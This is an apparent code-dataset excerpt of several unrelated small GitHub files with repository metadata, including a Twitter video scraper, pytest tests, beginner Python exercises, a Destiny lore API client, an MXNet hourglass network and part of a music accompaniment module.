like_str = \"\"\n # if likes > 0:\n # like_str = \"%20min_faves%3A\" + str(likes)\n\n if not lang:\n return api.search(q=tag + \" filter:native_video -filter:retweets\", rpp=count, count=count, min_faves=likes, include_entities=True)\n else:\n return api.search(q=tag + \" filter:native_video -filter:retweets\", rpp=count, count=count, min_faves=likes, lang=lang, include_entities=True)\n\n#get video url\ndef get_media(tweet):\n try:\n variants = tweet.extended_entities['media'][0]['video_info']['variants']\n return get_best_video(variants)\n except:\n return False\n\n#select highest quality url\ndef get_best_video(variants):\n highest = variants[0]\n for v in variants:\n if v['content_type'] == 'video/mp4':\n if highest['bitrate'] < v['bitrate']:\n highest = v\n\n return highest['url']\n\n#save media to device\ndef save_media(url, path):\n file = requests.get(url)\n path = path + \".mp4\"\n\n i = 1\n while os.path.isfile(path):\n path = path[:-4] + \"(\" + str(i) + \").mp4\"\n i += 1\n\n open(path, 'wb').write(file.content)\n\n#main method\ndef scrape(tag, path, count=10, likes=0, lang=None, zip=False):\n #create dir if not exists\n if not os.path.exists(path):\n os.mkdir(path)\n\n for i in search(tag, count = count, likes=likes, lang=lang):\n\n url = get_media(i)\n if url:\n save_media(url, path + i.user.screen_name)\n\n if zip:\n return get_zip_data(path)\n\n return True\n\ndef get_zip_data(path):\n base_path = pathlib.Path(\"./\"+path)\n data = io.BytesIO()\n with zipfile.ZipFile(data, mode='w') as z:\n for f_name in base_path.iterdir():\n z.write(f_name)\n os.unlink(f_name)\n os.rmdir(path)\n data.seek(0)\n return data\n\n\n#usage:\n#on terminal write python media_scraper.py [tag] [folder path] [tweet count]\nif __name__ == '__main__':\n print(sys.argv)\n if len(sys.argv) > 1:\n tag = sys.argv[1]\n path = sys.argv[2]\n count = int(sys.argv[3])\n likes=None\n if len(sys.argv) > 4:\n likes = count = int(sys.argv[4])\n scrape(tag, path, count=count, likes=likes)\n else:\n scrape(\"meme\", \"results/\")\n","repo_name":"jaortiz117/tweet-media-scraper","sub_path":"media_scraper.py","file_name":"media_scraper.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26493182567","text":"from copy import deepcopy\nfrom pathlib import Path\n\nimport pytest\n\nfrom gentle.generators.cpan import CpanGenerator\nfrom gentle.metadata import MetadataXML\nfrom tests.utils import compare_mxml\n\n\ndef test_pkg_none(mxml: MetadataXML):\n gen = CpanGenerator(Path(__file__).parent / \"pkg_none\")\n assert not gen.active\n\n\ndef test_pkg_empty(mxml: MetadataXML):\n gen = CpanGenerator(Path(__file__).parent / \"pkg_empty\")\n assert gen.active\n\n mxml_old = deepcopy(mxml)\n gen.update_metadata_xml(mxml)\n assert compare_mxml(mxml_old, mxml) == \"\"\n\n\n@pytest.mark.parametrize(\"dirname\", [\"URI\"])\ndef test_pkg(mxml: MetadataXML, dirname: str):\n gen = CpanGenerator(Path(__file__).parent / dirname)\n assert gen.active\n\n gen.update_metadata_xml(mxml)\n with open(Path(__file__).parent / dirname / \"metadata.xml\") as file:\n assert mxml.dumps() == file.read().rstrip()\n\n mxml_prev = deepcopy(mxml)\n gen.update_metadata_xml(mxml)\n assert compare_mxml(mxml_prev, mxml) == \"\"\n\n\n@pytest.mark.perl\ndef test_pkg_script_empty(mxml: MetadataXML):\n gen = CpanGenerator(Path(__file__).parent / \"pkg_script\" / \"empty\")\n assert gen.active\n\n mxml_old = deepcopy(mxml)\n gen.update_metadata_xml(mxml)\n assert 
compare_mxml(mxml_old, mxml) == \"\"\n\n\n@pytest.mark.perl\n@pytest.mark.parametrize(\"dirname\", [\"URI\"])\ndef test_pkg_script(mxml: MetadataXML, dirname: str):\n directory = Path(__file__).parent / \"pkg_script\" / dirname\n\n gen = CpanGenerator(directory)\n assert gen.active\n\n gen.update_metadata_xml(mxml)\n with open(directory / \"metadata.xml\") as file:\n assert mxml.dumps() == file.read().rstrip()\n\n mxml_prev = deepcopy(mxml)\n gen.update_metadata_xml(mxml)\n assert compare_mxml(mxml_prev, mxml) == \"\"\n","repo_name":"CyberTailor/gentle","sub_path":"tests/cpan/test_generator.py","file_name":"test_generator.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29231104855","text":"A, B = map(int, input().split())\nC = int(input())\nwhile C >= 0:\n if B + C > 59:\n A += 1\n C =C - (60 - B)\n B = 0\n else:\n B += C\n C = 0\n if A > 23:\n A = 0\n if C == 0:\n break\nprint(str(A) + \" \"+ str(B))","repo_name":"jshk1205/pythonPractice","sub_path":"2525.py","file_name":"2525.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35542140753","text":"from pickletools import OpcodeInfo\nfrom sqlite3 import IntegrityError\n\n\npizza = \"\"\"\nEliga el tamaño de pizza que desea\n(1)-Tamaño 1\n(2)-Tamaño 2\n(3)-Tamaño 3\n\"\"\"\nopcion = input(pizza)\ningre = int(input(\"Cuantos ingredientes desea llevar, Escribir 0 si ninguno\")) \ningre = 4000 * ingre\nif opcion == \"1\":\n total = 15000 + ingre\n print(\"el total es de : \", total)\nelif opcion == \"2\":\n total2 = 24000 + ingre\n print(\"El total es de\", total2 )\nelif opcion == \"3\":\n total3 = 36000 + ingre\n print(\"El total es de \", total3 )\n","repo_name":"SantiCrG/Python-Condicionales","sub_path":"09-Pizzas.py","file_name":"09-Pizzas.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22756030061","text":"import os\nfrom enum import Enum\nimport pickle\nimport difflib\nimport json\nimport roman\nimport html\n\nimport requests\n\nfrom utils.progressBar import ProgressBar\nfrom data.collectionsList import LORE_BOOK_COLLECTIONS, CHAPTERS\n\nclass Category:\n def __init__(self, data):\n self.hashName = data.get('ishtar_ref')\n self.name = data.get('name')\n self.ishtarUrl = data.get('ishtar_url')\n self.apiUrl = data.get('api_url')\n self.shortSummary = data.get('short_summary')\n self.summary = data.get('summary', None)\n self.plainTextSummary = data.get('plain_text_summary', None)\n self.featured = data.get('featured', None)\n self.chronological = data.get('chronological', None)\n self.count = data.get('count', None)\n\nclass GrimoireCard:\n def __init__(self, data):\n self.hashName = data.get('ishtar_ref')\n self.name = data.get('name')\n self.ishtarUrl = data.get('ishtar_url')\n self.apiUrl = data.get('api_url')\n self.shortSummary = data.get('short_summary')\n self.bungieRef = data.get('bungieRef')\n self.imageUrl = data.get('image_url')\n self.fullImageUrl = data.get('full_image_url')\n self.intro = data.get('intro')\n self.introAttribution = data.get('intro_attribution')\n self.description = html.unescape(data.get('description')).replace('
    ', '\\n') if data.get('description') else None\n self.bungieDeleted = data.get('bungie_deleted')\n if data.get('categories'):\n self.categories = [Category(i) for i in data.get('categories')]\n else:\n self.categories = []\n\nclass Item:\n def __init__(self, data):\n self.hashName = data.get('ishtar_ref')\n self.name = data.get('name')\n self.ishtarUrl = data.get('ishtar_url')\n self.apiUrl = data.get('api_url')\n self.shortSummary = data.get('short_summary')\n self.bungieRef = data.get('bungie_ref')\n self.imageUrl = data.get('image_url')\n self.fullImageUrl = data.get('full_image_url')\n self.displaySource = data.get('display_source')\n self.description = html.unescape(data.get('description')).replace('
    ', '\\n') if data.get('description') else None\n self.bungieDeleted = data.get('bungie_deleted')\n if data.get('categories'):\n self.categories = [Category(i) for i in data.get('categories')]\n else:\n self.categories = []\n\nclass LoreEntry:\n def __init__(self, data):\n self.hashName = data.get('ishtar_ref')\n self.name = data.get('name')\n self.ishtarUrl = data.get('ishtar_url')\n self.apiUrl = data.get('api_url')\n self.shortSummary = data.get('short_summary')\n self.bungieRef = data.get('bungie_ref')\n self.imageUrl = data.get('image_url')\n self.fullImageUrl = data.get('full_image_url')\n if self.fullImageUrl == '':\n self.fullImageUrl = \"./static/missing_entry.png\"\n self.subtitle = data.get('subtitle')\n self.description = html.unescape(data.get('description')).replace('
    ', '\\n') if data.get('description') else None\n self.bungieDeleted = data.get('bungie_deleted')\n if data.get('categories'):\n self.categories = [Category(i) for i in data.get('categories')]\n else:\n self.categories = []\n if data.get('items'):\n self.items = [Item(i) for i in data.get('items')]\n else:\n self.items = []\n\nclass Transcript:\n def __init__(self, data):\n self.hashName = data.get('ishtar_ref')\n self.name = data.get('name')\n self.ishtarUrl = data.get('ishtar_url')\n self.apiUrl = data.get('api_url')\n self.shortSummary = data.get('short_summary')\n\nclass Record:\n def __init__(self, data):\n self.hashName = data.get('ishtar_ref')\n self.name = data.get('name')\n self.ishtarUrl = data.get('ishtar_url')\n self.apiUrl = data.get('api_url')\n self.shortSummary = data.get('short_summary')\n self.bungieRef = data.get('bungie_ref')\n self.imageUrl = data.get('image_url')\n self.fullImageUrl = data.get('full_image_url')\n self.description = html.unescape(data.get('description')).replace('
    ', '\\n') if data.get('description') else None\n if data.get('categories'):\n self.categories = [Category(i) for i in data.get('categories')]\n else:\n self.categories = []\n\nclass IshtarManager:\n ISHTAR_ROOT = 'https://api.ishtar-collective.net/'\n BUNGIE_ROOT = 'https://www.bungie.net/'\n BUNGIE_API_EXT = '/Platform'\n\n class Collection(Enum):\n categories = \"categories\"\n grimoire_cards = \"cards\"\n items = \"items\"\n entries = \"entries\"\n transcripts = \"transcripts\"\n records = \"records\"\n\n def __init__(self, dataFileLoc):\n self.dataFileLoc = os.path.abspath(dataFileLoc)\n self.path = os.path.dirname(self.dataFileLoc)\n self._session = requests.Session()\n\n self.LORE_BOOK_COLLECTIONS = LORE_BOOK_COLLECTIONS\n self.CHAPTERS = CHAPTERS\n\n if not os.path.isfile(self.dataFileLoc):\n self.updateCollective()\n self.loadCollective()\n\n def loadCollective(self):\n with open(self.dataFileLoc, 'rb') as file:\n raw_data = pickle.load(file)\n for key in raw_data.keys():\n if len(raw_data[key]) == 0:\n continue\n if self.Collection(key) == self.Collection.categories:\n self.categories = [Category(j) for j in raw_data[key]]\n elif self.Collection(key) == self.Collection.grimoire_cards:\n self.grimoireCards = [GrimoireCard(j) for j in raw_data[key]]\n elif self.Collection(key) == self.Collection.items:\n self.items = [Item(j) for j in raw_data[key]]\n elif self.Collection(key) == self.Collection.entries:\n self.loreEntries = [LoreEntry(j) for j in raw_data[key]]\n elif self.Collection(key) == self.Collection.transcripts:\n self.transcripts = [Transcript(j) for j in raw_data[key]]\n elif self.Collection(key) == self.Collection.records:\n self.records = [Record(j) for j in raw_data[key]]\n print('Loaded Collective')\n\n def updateCollective(self):\n res = self._session.get(self.ISHTAR_ROOT)\n if res.status_code == 200:\n routing = res.json()\n raw_data = {}\n for collection in routing['navigation'].keys():\n data = self._session.get(routing['navigation'][collection])\n if data.status_code == 200:\n raw_data[collection] = []\n response = data.json()\n try:\n collection_prop = self.Collection(collection)\n pb = ProgressBar(' ', '█', response['meta']['total_count'])\n pb.progress(0, status = 'Loading Ishtar ' + collection.capitalize())\n while 'meta' in response.keys() and 'next_page' in response['meta'].keys() and response['meta']['next_page']:\n for i in response[collection_prop.name]:\n pb.progress(1, status = 'Loading Ishtar ' + collection.capitalize())\n raw_data[collection].append(i)\n data = self._session.get(response['meta']['next_page_url'])\n if data.status_code == 200:\n response = data.json()\n else:\n raise Exception(f\"Failed to retrieve Ishtar Collective {collection} collection: {data.status_code}\")\n pb.ETA()\n collection_prop = self.Collection(collection)\n for i in response[collection_prop.name]:\n pb.progress(1, status = 'Loading Ishtar ' + collection.capitalize())\n raw_data[collection].append(i)\n except:\n pass\n\n else:\n raise Exception(f\"Failed to retrieve Ishtar Collective {collection} collection: {data.status_code}\")\n with open(self.dataFileLoc, 'wb+') as file:\n pickle.dump(raw_data, file)\n else:\n raise Exception(f\"Failed to retrieve Ishtar Collective routing: {res.status_code}\")\n\n def buildCollections(self):\n collected = {}\n for card in self.grimoireCards:\n for category in card.categories:\n for collection in self.LORE_BOOK_COLLECTIONS[\"D1\"].keys():\n if not collection in collected.keys():\n collected[collection] = {\"cards\": []}\n for 
book in self.LORE_BOOK_COLLECTIONS[\"D1\"][collection]:\n if book.lower() in category.name.lower():\n collected[collection]['cards'].append(card)\n\n for entry in self.loreEntries:\n for category in entry.categories:\n for collection in self.LORE_BOOK_COLLECTIONS[\"D2\"].keys():\n if not collection in collected.keys():\n collected[collection] = {\"books\": {}}\n for book in self.LORE_BOOK_COLLECTIONS[\"D2\"][collection]:\n if book.lower() in category.name.lower():\n if not book in collected[collection][\"books\"].keys():\n collected[collection][\"books\"][book] = []\n collected[collection][\"books\"][book].append(entry)\n\n for entry in collected.keys():\n if 'cards' in collected[entry].keys():\n collected[entry]['cards'] = sorted(collected[entry]['cards'], key = self.sortD1Collection)\n elif 'books' in collected[entry].keys():\n collected[entry]['books'] = self.sortD2Books(collected[entry]['books'])\n\n return collected\n\n def sortD1Collection(self, x):\n x = x.name\n try:\n s = ':'.join(x.split(':')[1:])\n r = roman.fromRoman(x.split(':')[0])\n except:\n s = x\n if 'Curiosity' in s:\n r = 0\n elif 'Insight' in s:\n r = 200\n else:\n r = 0\n finally:\n return r, s\n\n def sortD2Books(self, books):\n res = {}\n for book in books.keys():\n res[book] = sorted(books[book], key = lambda x: self.CHAPTERS[book].index(x.name))\n return res\n\n def loadItemByName(self, name):\n name = difflib.get_close_matches(name, [item.name for item in self.items], n=1)\n if len(name) > 0:\n name = name[0]\n for item in self.items:\n if item.name == name:\n return item\n return None\n\n def loadItemsByName(self, name):\n names = difflib.get_close_matches(name, [item.name for item in self.items], n=16)\n for item in self.items:\n if item.name in names:\n names[names.index(item.name)] = item\n return names\n\n def loadGrimoireByName(self, name):\n names = difflib.get_close_matches(name, [card.name for card in self.grimoireCards], n=16)\n for card in self.grimoireCards:\n if card.name in names:\n names[names.index(card.name)] = card\n return names\n\n def loadLoreEntriesByName(self, name):\n names = difflib.get_close_matches(name, [entry.name for entry in self.loreEntries], n=16)\n for entry in self.loreEntries:\n if entry.name in names:\n names[names.index(entry.name)] = entry\n return names\n\nif __name__ == \"__main__\":\n manager = IshtarManager('./data/EncryptedIshtarData.pickle')\n manager.buildCollections()\n","repo_name":"Aryathel/DestinyLoreOrganization","sub_path":"utils/ishtarManager.py","file_name":"ishtarManager.py","file_ext":"py","file_size_in_byte":11960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"71502802807","text":"'''\n Queue : A Queue is a linear structure which follows a particular order in which the operations are performed. The order is First In First Out (FIFO).\n A good example of a queue is any queue of consumers for a resource where the consumer that came first is served first.The difference between\n stacks and queues is in removing. 
In a stack we remove the item the most recently added; in a queue, we remove the item the least recently added.\n\n Queue can be created by using both Singly and Doubly Linked list , in this implementation\n we will be using doubly linked list \n\n Basically as stack queue also has two operations enqueue and dequeue.\n as Queue uses FIFO (First in First Out) the elements are removed based on their insertion order\n i.e if 1,2,3,4,5,6 are inserted in the Queue then 1 will be the element to be removed first and will continue accordingly\n\n Here in this we will maintain two pointers that are mainly head and tail\n\n the Enqueueing process will be done from tail and Dequeueing will be done from head\n\n Enqueueing : The process of adding elements \n Dequeueing : The Process of removing elements\n\n Enqueuing :\n\n Initially both head and tail will point to a common Node :\n\n --------------\n head -> | data1 | next | <- tail\n --------------\n\n But as the Elements are added tail is shifted towards right (Enqueueing)\n\n # Step 1 :\n\n -------------- --------------\n head -> | data1 | next | -> | data2 | next | <- tail\n -------------- --------------\n\n # Step 2 :\n\n -------------- -------------- --------------\n head -> | data1 | next | -> | data2 | next | -> | data3 | next | <- tail\n -------------- -------------- --------------\n\n\n\n Dequeueing :\n\n This will start from left to right head will shift from Node to Node and will start removing \n Nodes according to their Insertion Order .\n\n # Step 1 :\n\n -------------- -------------- --------------\n head -> | data1 | next | -> | data2 | next | -> | data3 | next | <- tail\n -------------- -------------- --------------\n\n # Step 2 : \n\n As we can see data1 is removed from the Queue\n\n -------------- -------------- \n head -> -> | data2 | next | -> | data3 | next | <- tail\n -------------- -------------- \n\n # Step 3 :\n\n -------------- \n head -> | data3 | next | <- tail\n -------------- \n\n\n'''\n\n# Initializing our Node that we will use\nclass Node:\n\n def __init__(self):\n self.prev = None\n self.data = None\n self.next = None\n# Initializing our Queue Class\nclass Queue:\n\n def __init__(self):\n self.head = None\n self.tail = None\n\n\n # Function to Enqueue (Insertion) Elements in Queue\n def enqueue(self):\n new_node = Node()\n a = int(input(\"\\nEnter the data for node :\"))\n new_node.data = a\n if(self.head==None):\n self.head = new_node\n print(\"Initially Head and Tail are pointing to : %d \" % self.head.data )\n return\n\n last = self.head\n while(last.next!=None):\n last = last.next\n\n last.next = new_node\n new_node.prev = last\n self.tail = new_node\n print(\"Tail is pointing to : %d \" % self.tail.data )\n\n # Function to Print Queue\n def printqueue(self):\n\n if self.head==None :\n print(\"\\nQueue is Empty\")\n temp = self.head\n while(temp):\n print(temp.data)\n temp = temp.next\n\n # Function to Print the Queue in Reverse Order\n def reverse(self):\n temp = self.tail\n while(temp):\n print(temp.data)\n temp = temp.prev\n \n # Function that returns Head and Tail value\n def headtail(self):\n print(\"Head : %d \" % self.head.data)\n print(\"Tail : %d \\n\" % self.tail.data)\n\n # Function to Dequeue (Removing) Elements from the Queue\n def dequeue(self):\n\n if(self.head==None):\n print(\"\\nQueue is empty !!\")\n return\n\n print(\"\\nHead is pointing to %s \" % self.head.data)\n print(\"\\n%d is dequeued from the Queue. 
\" % self.head.data)\n temp = self.head\n self.head = temp.next\n temp=None\n # return\n\n# Main function \nif __name__ == \"__main__\":\n q1 = Queue() \n for i in range(0,6):\n q1.enqueue()\n print(\"\\nElement in queue are as follow:\\n\")\n q1.printqueue()\n print(\"\\nThe values of head and tail are :\\n\")\n q1.headtail()\n q1.reverse()\n for i in range(0,6):\n q1.dequeue()\n q1.printqueue()","repo_name":"Bhush98/queue_in_python","sub_path":"queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":4766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"32318162300","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport mxnet as mx\nimport numpy as np\nfrom config import config\nfrom block import conv_block, ConvFactory\nfrom heatmap import l2_loss, ce_loss, SymCoherent\n\n\n\ndef Conv(**kwargs):\n body = mx.sym.Convolution(**kwargs)\n return body\n\ndef Act(data, act_type, name):\n if act_type=='prelu':\n body = mx.sym.LeakyReLU(data = data, act_type='prelu', name = name)\n else:\n body = mx.symbol.Activation(data=data, act_type=act_type, name=name)\n return body\n \n\ndef hourglass(data, nFilters, nModules, n, workspace, name, binarize, dcn):\n s = 2\n _dcn = False\n up1 = data\n for i in xrange(nModules):\n up1 = conv_block(up1, nFilters, (1,1), True, \"%s_up1_%d\"%(name,i), binarize, _dcn, 1)\n low1 = mx.sym.Pooling(data=data, kernel=(s, s), stride=(s,s), pad=(0,0), pool_type='max')\n for i in xrange(nModules):\n low1 = conv_block(low1, nFilters, (1,1), True, \"%s_low1_%d\"%(name,i), binarize, _dcn, 1)\n if n>1:\n low2 = hourglass(low1, nFilters, nModules, n-1, workspace, \"%s_%d\"%(name, n-1), binarize, dcn)\n else:\n low2 = low1\n for i in xrange(nModules):\n low2 = conv_block(low2, nFilters, (1,1), True, \"%s_low2_%d\"%(name,i), binarize, _dcn, 1) #TODO\n low3 = low2\n for i in xrange(nModules):\n low3 = conv_block(low3, nFilters, (1,1), True, \"%s_low3_%d\"%(name,i), binarize, _dcn, 1)\n up2 = mx.symbol.UpSampling(low3, scale=s, sample_type='nearest', workspace=512, name='%s_upsampling_%s'%(name,n), num_args=1)\n return mx.symbol.add_n(up1, up2)\n\n\ndef get_symbol(num_classes):\n m = config.multiplier\n sFilters = max(int(64*m), 32)\n mFilters = max(int(128*m), 32)\n nFilters = int(256*m)\n\n nModules = 1\n bn_mom = config.bn_mom\n workspace = config.workspace\n nStacks = config.net_stacks\n binarize = config.net_binarize\n input_size = config.input_img_size\n label_size = config.output_label_size\n use_coherent = config.net_coherent\n use_SAT = config.net_sat\n N = config.net_n\n DCN = config.net_dcn\n per_batch_size = config.per_batch_size\n print('binarize', binarize)\n print('use_coherent', use_coherent)\n print('use_SAT', use_SAT)\n print('use_N', N)\n print('use_DCN', DCN)\n print('per_batch_size', per_batch_size)\n #assert(label_size==64 or label_size==32)\n #assert(input_size==128 or input_size==256)\n coherentor = SymCoherent(per_batch_size)\n D = input_size // label_size\n print(input_size, label_size, D)\n data = mx.sym.Variable(name='data')\n data = data-127.5\n data = data*0.0078125\n gt_label = mx.symbol.Variable(name='softmax_label')\n losses = []\n closses = []\n ref_label = gt_label\n if D==4:\n body = Conv(data=data, num_filter=sFilters, kernel=(7, 7), stride=(2,2), pad=(3, 3),\n no_bias=True, name=\"conv0\", workspace=workspace)\n else:\n body = Conv(data=data, num_filter=sFilters, kernel=(3, 3), stride=(1,1), 
pad=(1, 1),\n no_bias=True, name=\"conv0\", workspace=workspace)\n body = mx.sym.BatchNorm(data=body, fix_gamma=False, eps=2e-5, momentum=bn_mom, name='bn0')\n body = Act(data=body, act_type='relu', name='relu0')\n\n dcn = False\n body = conv_block(body, mFilters, (1,1), sFilters==mFilters, 'res0', False, dcn, 1)\n\n body = mx.sym.Pooling(data=body, kernel=(2, 2), stride=(2,2), pad=(0,0), pool_type='max')\n\n body = conv_block(body, mFilters, (1,1), True, 'res1', False, dcn, 1) #TODO\n body = conv_block(body, nFilters, (1,1), mFilters==nFilters, 'res2', binarize, dcn, 1) #binarize=True?\n\n heatmap = None\n\n for i in xrange(nStacks):\n shortcut = body\n if config.net_sat>0:\n sat = SAT(body, nFilters, nModules, config.net_n+1, workspace, 'sat%d'%(i))\n body = sat.get()\n else:\n body = hourglass(body, nFilters, nModules, config.net_n, workspace, 'stack%d_hg'%(i), binarize, dcn)\n for j in xrange(nModules):\n body = conv_block(body, nFilters, (1,1), True, 'stack%d_unit%d'%(i,j), binarize, dcn, 1)\n _dcn = True if config.net_dcn>=2 else False\n ll = ConvFactory(body, nFilters, (1,1), dcn = _dcn, name='stack%d_ll'%(i))\n _name = \"heatmap%d\"%(i) if i=2 else False\n if not _dcn:\n out = Conv(data=ll, num_filter=num_classes, kernel=(1, 1), stride=(1,1), pad=(0,0),\n name=_name, workspace=workspace)\n else:\n out_offset = mx.symbol.Convolution(name=_name+'_offset', data = ll,\n num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))\n out = mx.contrib.symbol.DeformableConvolution(name=_name, data=ll, offset=out_offset,\n num_filter=num_classes, pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=False)\n #out = Conv(data=ll, num_filter=num_classes, kernel=(3,3), stride=(1,1), pad=(1,1),\n # name=_name, workspace=workspace)\n\n _dcn = True if (config.net_dcn==1 or config.net_dcn==3) else False\n if i0:\n ux, dx = coherentor.get(out)\n closs = l2_loss(ux, dx)\n closs = closs/nStacks\n closses.append(closs)\n\n pred = mx.symbol.BlockGrad(heatmap)\n #loss = mx.symbol.add_n(*losses)\n #loss = mx.symbol.MakeLoss(loss)\n #syms = [loss]\n syms = []\n for loss in losses:\n loss = mx.symbol.MakeLoss(loss)\n syms.append(loss)\n if len(closses)>0:\n coherent_weight = 0.0001\n closs = mx.symbol.add_n(*closses)\n closs = mx.symbol.MakeLoss(closs, grad_scale = coherent_weight)\n syms.append(closs)\n syms.append(pred)\n sym = mx.symbol.Group( syms )\n return sym","repo_name":"deepinx/deep-face-alignment","sub_path":"symbols/hourglass.py","file_name":"hourglass.py","file_ext":"py","file_size_in_byte":7124,"program_lang":"python","lang":"en","doc_type":"code","stars":144,"dataset":"github-code","pt":"76"} +{"seq_id":"3375680195","text":"import asyncio\n\nimport aiohttp\n\n\nclass AsyncSession:\n def __init__(self, url):\n self._url = url\n\n async def __aenter__(self):\n self.session = aiohttp.ClientSession()\n response = await self.session.get(self._url)\n return response\n\n async def __aexit__(self, exc_type, exc_value, traceback):\n await self.session.close()\n\n\nasync def check(url):\n async with AsyncSession(url) as response:\n html = await response.text()\n print(f\"{url}: {html[:15]}\")\n\n\nasync def main():\n res1 = asyncio.create_task(check(\"https://facebook.com\"))\n res2 = asyncio.create_task(check(\"https://youtube.com\"))\n res3 = asyncio.create_task(check(\"https://google.com\"))\n\n print(await res1)\n print(await res2)\n print(await 
res3)\n\n\nasyncio.run(main())\n","repo_name":"Beforethedoor/asyncio","sub_path":"7_async_with.py","file_name":"7_async_with.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18921747025","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport pylab\n\n#A experiment is carried out ntrials times in which n coins are tossed and the total number of heads each time is recorded\n\nntrials = 100\nn = 100 # number of coins tossed\na = np.random.randint(2, size=(ntrials, n))\nHeads=np.array([np.sum(side==0) for side in a])\n\n_, bins, _ = pylab.hist(Heads, bins=ntrials-1, normed=True, histtype='bar')\n#Binomial distribution\nb =[np.math.factorial(ntrials)/(np.math.factorial(int(item))*np.math.factorial(ntrials - int(item))) for item in bins]\nc = b*0.5**(bins) * (1-0.5)**(ntrials-bins)\nprint(c)\npylab.plot(bins, c)\n\n#Distribuição normal\npylab.plot(bins,1/(Heads.std() * np.sqrt(2*np.pi))*np.exp(-(bins - Heads.mean())**2 / (2*Heads.std()**2)), lw=2) \npylab.xlabel('Number of Heads')\npylab.ylabel('Probability')\npylab.show()\n","repo_name":"gfdemelo/data_codes","sub_path":"Scientific_Python_Scipy/chapter_6/P6_7_1.py","file_name":"P6_7_1.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"629693230","text":"class Aircraft:\n __fuel = 0 # private attribute containing current fuel in aircraft\n maxFuel = 24000\n __fuelCheck = False # this is a Boolean flag for a pre-flight check.\n MIN_FUEL = 1000 # minimum amount of fuel for takeoff\n __flightClearance = False\n flightNum = \"\"\n\n def __init__(self, planeType=\"747\"):\n self.planeType = planeType\n\n def setFlightNum(self, flightNum):\n self.flightNum = flightNum\n\n def fuelCheck(self):\n if self.__fuel < self.MIN_FUEL:\n print(\"Fuel Check Failed: Current fuel below safe limit:\", self.__fuel,\n \" less than \", self.MIN_FUEL)\n self.__fuelCheck = False\n else:\n print(\"Fuel Check Complete:\", self.__fuel)\n self.__fuelCheck = True\n\n def takeOff(self):\n if self.__fuelCheck == True:\n print(\"Cleared for Takeoff! Fasten your seat-belt!\")\n else:\n print(\"Take off Failed: Please complete pre-flight check first\")\n print(self.fuelCheck())\n\n def printStatus(self):\n print(\"Current fuel:\", self.__fuel)\n\n def addFuel(self, volume):\n unusedFuel = 0\n\n if volume < 0:\n print(\"No syphoning fuel!\")\n elif self.__fuel + volume <= self.maxFuel:\n self.__fuel = self.__fuel + volume\n elif self.__fuel + volume > self.maxFuel:\n self.__fuel = self.maxFuel\n unusedFuel = volume - self.__fuel\n\n return unusedFuel\n\n def preFlightCheck(self):\n if self.__fuelCheck == False:\n self.__flightClearance = False\n print(\"DANGER!! DO NOT TAKE OFF!. You are not authorized for clearance!\")\n\n else:\n self.__flightClearance = True\n print(\"Clearance authorized. 
You can proceed!\")\n self.takeOff()\n","repo_name":"ConorMB93/Python1","sub_path":"Aircraft.py","file_name":"Aircraft.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37482174058","text":"# patSolo.py\n\n\"\"\"\nThis module is an integeral part of the program\nMMA - Musical Midi Accompaniment.\n\nThis program is free software; you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation; either version 2 of the License, or\n(at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program; if not, write to the Free Software\nFoundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\nBob van der Poel \n\n\"\"\"\n\nimport MMA.notelen\nimport MMA.translate\nimport MMA.harmony\nimport MMA.volume\nimport MMA.alloc\nimport MMA.swing\nimport MMA.truncate\n\nfrom . import gbl\n\nfrom MMA.common import *\nfrom MMA.pat import PC, Pgroup\nfrom MMA.keysig import keySig\nimport MMA.debug\n\nimport re\nimport random\n\n\n# Each note in a solo gets a NoteEvent.\nclass NoteEvent:\n def __init__(self, pitch, velocity, isgrace):\n self.duration = None\n self.pitch = pitch\n self.articulation = None\n self.velocity = velocity\n self.defvelocity = velocity\n self.isgrace = isgrace # signal grace note, no harmony and change offset\n\naccValues = {'#': 1, \"&\": -1, 'n': 0}\n\n# used when extracting solo notes.\ndefaultVelocity = 90\n\n##############################\n\n\nclass Melody(PC):\n \"\"\" The melody and solo tracks are identical, expect that\n the solo tracks DO NOT get saved in grooves and are only\n initialized once.\n \"\"\"\n\n vtype = 'MELODY'\n drumType = None\n\n endTilde = []\n drumTone = 38\n arpRate = 0\n arpDecay = 0\n arpDirection = 'UP'\n stretch = 1\n followChord = 0\n followKey = 1\n rootChord = 0 # start off with a C chord as default\n\n def __init__(self, ln):\n \"\"\" We need special init here incase this is converted to drumType.\n If we don't have a toneList, we're screwed.\n \"\"\"\n\n self.toneList = [self.drumTone]\n PC.__init__(self, ln) # This order is important!\n\n def setDrumType(self):\n \"\"\" Set this track to be a drum track. \"\"\"\n\n if self.channel:\n error(\"You cannot change a track to DRUM once it has been used\")\n\n self.drumType = 1\n self.setChannel('10') # MMA 